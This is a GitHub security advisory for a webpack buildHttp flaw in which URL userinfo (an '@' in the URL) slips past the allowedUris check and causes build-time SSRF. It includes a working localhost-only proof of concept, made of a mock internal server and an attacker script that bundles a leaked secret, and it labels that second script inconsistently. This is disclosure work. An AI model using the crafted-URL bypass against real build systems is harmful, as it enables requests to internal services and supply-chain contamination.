GHSA-8FGC-7CC6-RX7X
Vulnerability from github – Published: 2026-02-05 18:38 – Updated: 2026-02-06 14:39
VLAI?
Summary
webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior
Details
Summary
When experiments.buildHttp is enabled, webpack’s HTTP(S) resolver (HttpUriPlugin) can be bypassed to fetch resources from hosts outside allowedUris by using crafted URLs that include userinfo (username:password@host). If allowedUris enforcement relies on a raw string prefix check (e.g., uri.startsWith(allowed)), a URL that looks allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a policy/allow-list bypass that enables build-time SSRF behavior (outbound requests from the build machine to internal-only endpoints, depending on network access) and untrusted content inclusion (the fetched response is treated as module source and bundled). In my reproduction, the internal response was also persisted in the buildHttp cache.
Reproduced on: - webpack version: 5.104.0 - Node version: v18.19.1
Details
Root cause (high level): allowedUris validation can be performed on the raw URI string, while the actual request destination is determined later by parsing the URL (e.g., new URL(uri)), which interprets the authority as the part after @.
Example crafted URL:
- http://127.0.0.1:9000@127.0.0.1:9100/secret.js
If the allow-list is ["http://127.0.0.1:9000"], then:
- Raw string check:
crafted.startsWith("http://127.0.0.1:9000") → true
- URL parsing (WHAT new URL() will contact):
origin → http://127.0.0.1:9100 (host/port after @)
As a result, webpack fetches http://127.0.0.1:9100/secret.js even though allowedUris only included http://127.0.0.1:9000.
Evidence from reproduction:
- Server logs showed the internal-only endpoint being fetched:
- [internal] 200 /secret.js served (...) (observed multiple times)
- Attacker-side build output showed:
- the internal secret marker was present in the bundle
- the internal secret marker was present in the buildHttp cache
PoC
This PoC is intentionally constrained to 127.0.0.1 (localhost-only “internal service”) to demonstrate SSRF behavior safely.
1) Setup
mkdir split-userinfo-poc && cd split-userinfo-poc
npm init -y
npm i -D webpack webpack-cli
2) Create server.js
#!/usr/bin/env node
"use strict";
const http = require("http");
const ALLOWED_PORT = 9000; // allowlisted-looking host
const INTERNAL_PORT = 9100; // actual target if bypass succeeds
const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;
const internalPayload =
`// internal-only\n` +
`export const secret = ${JSON.stringify(secret)};\n` +
`export default "ok";\n`;
function listen(port, handler) {
return new Promise(resolve => {
const s = http.createServer(handler);
s.listen(port, "127.0.0.1", () => resolve(s));
});
}
(async () => {
// "Allowed" host (should NOT be contacted if bypass works as intended)
await listen(ALLOWED_PORT, (req, res) => {
console.log(`[allowed-host] ${req.method} ${req.url} (should NOT be hit in userinfo bypass)`);
res.statusCode = 200;
res.setHeader("Content-Type", "application/javascript; charset=utf-8");
res.end(`export default "ALLOWED_HOST_WAS_HIT_UNEXPECTEDLY";\n`);
});
// Internal-only service (SSRF-like target)
await listen(INTERNAL_PORT, (req, res) => {
if (req.url === "/secret.js") {
console.log(`[internal] 200 /secret.js served (secret=${secret})`);
res.statusCode = 200;
res.setHeader("Content-Type", "application/javascript; charset=utf-8");
res.end(internalPayload);
return;
}
console.log(`[internal] 404 ${req.method} ${req.url}`);
res.statusCode = 404;
res.end("not found");
});
console.log("\nServers up:");
console.log(`- allowed-host (should NOT be contacted): http://127.0.0.1:${ALLOWED_PORT}/`);
console.log(`- internal target (should be contacted if vulnerable): http://127.0.0.1:${INTERNAL_PORT}/secret.js`);
})();
2) Create server.js
#!/usr/bin/env node
"use strict";
const path = require("path");
const os = require("os");
const fs = require("fs/promises");
const webpack = require("webpack");
function fmtBool(b) { return b ? "✅" : "❌"; }
async function walk(dir) {
const out = [];
let items;
try { items = await fs.readdir(dir, { withFileTypes: true }); }
catch { return out; }
for (const it of items) {
const p = path.join(dir, it.name);
if (it.isDirectory()) out.push(...await walk(p));
else if (it.isFile()) out.push(p);
}
return out;
}
async function fileContains(f, needle) {
try {
const buf = await fs.readFile(f);
const s1 = buf.toString("utf8");
if (s1.includes(needle)) return true;
const s2 = buf.toString("latin1");
return s2.includes(needle);
} catch {
return false;
}
}
(async () => {
const webpackVersion = require("webpack/package.json").version;
const ALLOWED_PORT = 9000;
const INTERNAL_PORT = 9100;
// NOTE: allowlist is intentionally specified without a trailing slash
// to demonstrate the risk of raw string prefix checks.
const allowedUri = `http://127.0.0.1:${ALLOWED_PORT}`;
// Crafted URL using userinfo so that:
// - The string begins with allowedUri
// - The actual authority (host:port) after '@' is INTERNAL_PORT
const crafted = `http://127.0.0.1:${ALLOWED_PORT}@127.0.0.1:${INTERNAL_PORT}/secret.js`;
const parsed = new URL(crafted);
const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-httpuri-userinfo-poc-"));
const srcDir = path.join(tmp, "src");
const distDir = path.join(tmp, "dist");
const cacheDir = path.join(tmp, ".buildHttp-cache");
const lockfile = path.join(tmp, "webpack.lock");
const bundlePath = path.join(distDir, "bundle.js");
await fs.mkdir(srcDir, { recursive: true });
await fs.mkdir(distDir, { recursive: true });
await fs.writeFile(
path.join(srcDir, "index.js"),
`import { secret } from ${JSON.stringify(crafted)};
console.log("LEAKED_SECRET:", secret);
export default secret;
`
);
const config = {
context: tmp,
mode: "development",
entry: "./src/index.js",
output: { path: distDir, filename: "bundle.js" },
experiments: {
buildHttp: {
allowedUris: [allowedUri],
cacheLocation: cacheDir,
lockfileLocation: lockfile,
upgrade: true
}
}
};
console.log("\n[ENV]");
console.log(`- webpack version: ${webpackVersion}`);
console.log(`- node version: ${process.version}`);
console.log(`- allowedUris: ${JSON.stringify([allowedUri])}`);
console.log("\n[CRAFTED URL]");
console.log(`- import specifier: ${crafted}`);
console.log(`- WHAT startsWith() sees: begins with "${allowedUri}" => ${fmtBool(crafted.startsWith(allowedUri))}`);
console.log(`- WHAT URL() parses:`);
console.log(` - username: ${JSON.stringify(parsed.username)} (userinfo)`);
console.log(` - password: ${JSON.stringify(parsed.password)} (userinfo)`);
console.log(` - hostname: ${parsed.hostname}`);
console.log(` - port: ${parsed.port}`);
console.log(` - origin: ${parsed.origin}`);
console.log(` - NOTE: request goes to origin above (host/port after @), not to "${allowedUri}"`);
const compiler = webpack(config);
compiler.run(async (err, stats) => {
try {
if (err) throw err;
const info = stats.toJson({ all: false, errors: true, warnings: true });
if (stats.hasErrors()) {
console.error("\n[WEBPACK ERRORS]");
console.error(info.errors);
process.exitCode = 1;
return;
}
const bundle = await fs.readFile(bundlePath, "utf8");
const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);
const foundSecret = m ? m[0] : null;
console.log("\n[RESULT]");
console.log(`- temp dir: ${tmp}`);
console.log(`- bundle: ${bundlePath}`);
console.log(`- lockfile: ${lockfile}`);
console.log(`- cacheDir: ${cacheDir}`);
console.log("\n[SECURITY CHECK]");
console.log(`- bundle contains INTERNAL_ONLY_SECRET_* : ${fmtBool(!!foundSecret)}`);
if (foundSecret) {
const lockHit = await fileContains(lockfile, foundSecret);
const cacheFiles = await walk(cacheDir);
let cacheHit = false;
for (const f of cacheFiles) {
if (await fileContains(f, foundSecret)) { cacheHit = true; break; }
}
console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);
console.log(`- cache contains secret: ${fmtBool(cacheHit)}`);
}
} catch (e) {
console.error(e);
process.exitCode = 1;
} finally {
compiler.close(() => {});
}
});
})();
4) Run
Terminal A:
node server.js
Terminal B:
node attacker.js
5) Expected vs Actual
Expected: The import should be blocked because the effective request destination is http://127.0.0.1:9100/secret.js, which is outside allowedUris (only http://127.0.0.1:9000 is allow-listed).
Actual: The crafted URL passes the allow-list prefix validation, webpack fetches the internal-only resource on port 9100 (confirmed by server logs), and the secret marker appears in the bundle and buildHttp cache.
Impact
Vulnerability class: Policy/allow-list bypass leading to build-time SSRF behavior and untrusted content inclusion in build outputs.
Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary. If an attacker can influence the imported HTTP(S) specifier (e.g., via source contribution, dependency manipulation, or configuration), they can cause outbound requests from the build environment to endpoints outside the allow-list (including internal-only services, subject to network reachability). The fetched response can be treated as module source and included in build outputs and persisted in the buildHttp cache, increasing the risk of leakage or supply-chain contamination.
Severity ?
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.104.0"
},
"package": {
"ecosystem": "npm",
"name": "webpack"
},
"ranges": [
{
"events": [
{
"introduced": "5.49.0"
},
{
"fixed": "5.104.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68458"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-05T18:38:10Z",
"nvd_published_at": "2026-02-05T23:15:53Z",
"severity": "LOW"
},
"details": "### Summary\nWhen `experiments.buildHttp` is enabled, webpack\u2019s HTTP(S) resolver (`HttpUriPlugin`) can be bypassed to fetch resources from **hosts outside `allowedUris`** by using crafted URLs that include **userinfo** (`username:password@host`). If `allowedUris` enforcement relies on a **raw string prefix check** (e.g., `uri.startsWith(allowed)`), a URL that *looks* allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a **policy/allow-list bypass** that enables **build-time SSRF behavior** (outbound requests from the build machine to internal-only endpoints, depending on network access) and **untrusted content inclusion** (the fetched response is treated as module source and bundled). In my reproduction, the internal response was also persisted in the buildHttp cache.\n\nReproduced on:\n- webpack version: **5.104.0**\n- Node version: **v18.19.1**\n\n### Details\n**Root cause (high level):** `allowedUris` validation can be performed on the raw URI string, while the actual request destination is determined later by parsing the URL (e.g., `new URL(uri)`), which interprets the **authority** as the part after `@`.\n\nExample crafted URL:\n- `http://127.0.0.1:9000@127.0.0.1:9100/secret.js`\n\nIf the allow-list is `[\"http://127.0.0.1:9000\"]`, then:\n- Raw string check: \n `crafted.startsWith(\"http://127.0.0.1:9000\")` \u2192 **true**\n- URL parsing (WHAT `new URL()` will contact): \n `origin` \u2192 `http://127.0.0.1:9100` (host/port after `@`)\n\nAs a result, webpack fetches `http://127.0.0.1:9100/secret.js` even though `allowedUris` only included `http://127.0.0.1:9000`.\n\n**Evidence from reproduction:**\n- Server logs showed the internal-only endpoint being fetched:\n - `[internal] 200 /secret.js served (...)` (observed multiple times)\n- Attacker-side build output showed:\n - the internal secret marker was present in the **bundle**\n - the internal secret marker was present in the **buildHttp cache**\n\n\u003cimg width=\"1651\" height=\"381\" alt=\"image-2\" src=\"https://github.com/user-attachments/assets/8fd81b35-0d4f-424b-b60e-0a2582a8b492\" /\u003e\n\n### PoC\nThis PoC is intentionally constrained to **127.0.0.1** (localhost-only \u201cinternal service\u201d) to demonstrate SSRF behavior safely.\n\n#### 1) Setup\n```bash\nmkdir split-userinfo-poc \u0026\u0026 cd split-userinfo-poc\nnpm init -y\nnpm i -D webpack webpack-cli\n```\n\n#### 2) Create server.js\n```js\n#!/usr/bin/env node\n\"use strict\";\n\nconst http = require(\"http\");\n\nconst ALLOWED_PORT = 9000; // allowlisted-looking host\nconst INTERNAL_PORT = 9100; // actual target if bypass succeeds\n\nconst secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;\nconst internalPayload =\n `// internal-only\\n` +\n `export const secret = ${JSON.stringify(secret)};\\n` +\n `export default \"ok\";\\n`;\n\nfunction listen(port, handler) {\n return new Promise(resolve =\u003e {\n const s = http.createServer(handler);\n s.listen(port, \"127.0.0.1\", () =\u003e resolve(s));\n });\n}\n\n(async () =\u003e {\n // \"Allowed\" host (should NOT be contacted if bypass works as intended)\n await listen(ALLOWED_PORT, (req, res) =\u003e {\n console.log(`[allowed-host] ${req.method} ${req.url} (should NOT be hit in userinfo bypass)`);\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/javascript; charset=utf-8\");\n res.end(`export default \"ALLOWED_HOST_WAS_HIT_UNEXPECTEDLY\";\\n`);\n });\n\n // Internal-only service (SSRF-like target)\n await listen(INTERNAL_PORT, (req, res) =\u003e {\n if (req.url === \"/secret.js\") {\n console.log(`[internal] 200 /secret.js served (secret=${secret})`);\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/javascript; charset=utf-8\");\n res.end(internalPayload);\n return;\n }\n console.log(`[internal] 404 ${req.method} ${req.url}`);\n res.statusCode = 404;\n res.end(\"not found\");\n });\n\n console.log(\"\\nServers up:\");\n console.log(`- allowed-host (should NOT be contacted): http://127.0.0.1:${ALLOWED_PORT}/`);\n console.log(`- internal target (should be contacted if vulnerable): http://127.0.0.1:${INTERNAL_PORT}/secret.js`);\n})();\n```\n\n#### 2) Create server.js\n```js\n#!/usr/bin/env node\n\"use strict\";\n\nconst path = require(\"path\");\nconst os = require(\"os\");\nconst fs = require(\"fs/promises\");\nconst webpack = require(\"webpack\");\n\nfunction fmtBool(b) { return b ? \"\u2705\" : \"\u274c\"; }\n\nasync function walk(dir) {\n const out = [];\n let items;\n try { items = await fs.readdir(dir, { withFileTypes: true }); }\n catch { return out; }\n for (const it of items) {\n const p = path.join(dir, it.name);\n if (it.isDirectory()) out.push(...await walk(p));\n else if (it.isFile()) out.push(p);\n }\n return out;\n}\n\nasync function fileContains(f, needle) {\n try {\n const buf = await fs.readFile(f);\n const s1 = buf.toString(\"utf8\");\n if (s1.includes(needle)) return true;\n const s2 = buf.toString(\"latin1\");\n return s2.includes(needle);\n } catch {\n return false;\n }\n}\n\n(async () =\u003e {\n const webpackVersion = require(\"webpack/package.json\").version;\n\n const ALLOWED_PORT = 9000;\n const INTERNAL_PORT = 9100;\n\n // NOTE: allowlist is intentionally specified without a trailing slash\n // to demonstrate the risk of raw string prefix checks.\n const allowedUri = `http://127.0.0.1:${ALLOWED_PORT}`;\n\n // Crafted URL using userinfo so that:\n // - The string begins with allowedUri\n // - The actual authority (host:port) after \u0027@\u0027 is INTERNAL_PORT\n const crafted = `http://127.0.0.1:${ALLOWED_PORT}@127.0.0.1:${INTERNAL_PORT}/secret.js`;\n const parsed = new URL(crafted);\n\n const tmp = await fs.mkdtemp(path.join(os.tmpdir(), \"webpack-httpuri-userinfo-poc-\"));\n const srcDir = path.join(tmp, \"src\");\n const distDir = path.join(tmp, \"dist\");\n const cacheDir = path.join(tmp, \".buildHttp-cache\");\n const lockfile = path.join(tmp, \"webpack.lock\");\n const bundlePath = path.join(distDir, \"bundle.js\");\n\n await fs.mkdir(srcDir, { recursive: true });\n await fs.mkdir(distDir, { recursive: true });\n\n await fs.writeFile(\n path.join(srcDir, \"index.js\"),\n `import { secret } from ${JSON.stringify(crafted)};\nconsole.log(\"LEAKED_SECRET:\", secret);\nexport default secret;\n`\n );\n\n const config = {\n context: tmp,\n mode: \"development\",\n entry: \"./src/index.js\",\n output: { path: distDir, filename: \"bundle.js\" },\n experiments: {\n buildHttp: {\n allowedUris: [allowedUri],\n cacheLocation: cacheDir,\n lockfileLocation: lockfile,\n upgrade: true\n }\n }\n };\n\n console.log(\"\\n[ENV]\");\n console.log(`- webpack version: ${webpackVersion}`);\n console.log(`- node version: ${process.version}`);\n console.log(`- allowedUris: ${JSON.stringify([allowedUri])}`);\n\n console.log(\"\\n[CRAFTED URL]\");\n console.log(`- import specifier: ${crafted}`);\n console.log(`- WHAT startsWith() sees: begins with \"${allowedUri}\" =\u003e ${fmtBool(crafted.startsWith(allowedUri))}`);\n console.log(`- WHAT URL() parses:`);\n console.log(` - username: ${JSON.stringify(parsed.username)} (userinfo)`);\n console.log(` - password: ${JSON.stringify(parsed.password)} (userinfo)`);\n console.log(` - hostname: ${parsed.hostname}`);\n console.log(` - port: ${parsed.port}`);\n console.log(` - origin: ${parsed.origin}`);\n console.log(` - NOTE: request goes to origin above (host/port after @), not to \"${allowedUri}\"`);\n\n const compiler = webpack(config);\n\n compiler.run(async (err, stats) =\u003e {\n try {\n if (err) throw err;\n const info = stats.toJson({ all: false, errors: true, warnings: true });\n\n if (stats.hasErrors()) {\n console.error(\"\\n[WEBPACK ERRORS]\");\n console.error(info.errors);\n process.exitCode = 1;\n return;\n }\n\n const bundle = await fs.readFile(bundlePath, \"utf8\");\n const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);\n const foundSecret = m ? m[0] : null;\n\n console.log(\"\\n[RESULT]\");\n console.log(`- temp dir: ${tmp}`);\n console.log(`- bundle: ${bundlePath}`);\n console.log(`- lockfile: ${lockfile}`);\n console.log(`- cacheDir: ${cacheDir}`);\n\n console.log(\"\\n[SECURITY CHECK]\");\n console.log(`- bundle contains INTERNAL_ONLY_SECRET_* : ${fmtBool(!!foundSecret)}`);\n\n if (foundSecret) {\n const lockHit = await fileContains(lockfile, foundSecret);\n\n const cacheFiles = await walk(cacheDir);\n let cacheHit = false;\n for (const f of cacheFiles) {\n if (await fileContains(f, foundSecret)) { cacheHit = true; break; }\n }\n\n console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);\n console.log(`- cache contains secret: ${fmtBool(cacheHit)}`);\n }\n } catch (e) {\n console.error(e);\n process.exitCode = 1;\n } finally {\n compiler.close(() =\u003e {});\n }\n });\n})();\n```\n\n\n#### 4) Run\nTerminal A:\n```bash\nnode server.js\n```\n\nTerminal B:\n```bash\nnode attacker.js\n```\n\n#### 5) Expected vs Actual\n\nExpected: The import should be blocked because the effective request destination is http://127.0.0.1:9100/secret.js, which is outside allowedUris (only http://127.0.0.1:9000 is allow-listed).\n\nActual: The crafted URL passes the allow-list prefix validation, webpack fetches the internal-only resource on port 9100 (confirmed by server logs), and the secret marker appears in the bundle and buildHttp cache.\n\n### Impact\n\nVulnerability class: Policy/allow-list bypass leading to build-time SSRF behavior and untrusted content inclusion in build outputs.\n\nWho is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary. If an attacker can influence the imported HTTP(S) specifier (e.g., via source contribution, dependency manipulation, or configuration), they can cause outbound requests from the build environment to endpoints outside the allow-list (including internal-only services, subject to network reachability). The fetched response can be treated as module source and included in build outputs and persisted in the buildHttp cache, increasing the risk of leakage or supply-chain contamination.",
"id": "GHSA-8fgc-7cc6-rx7x",
"modified": "2026-02-06T14:39:29Z",
"published": "2026-02-05T18:38:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-8fgc-7cc6-rx7x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68458"
},
{
"type": "PACKAGE",
"url": "https://github.com/webpack/webpack"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…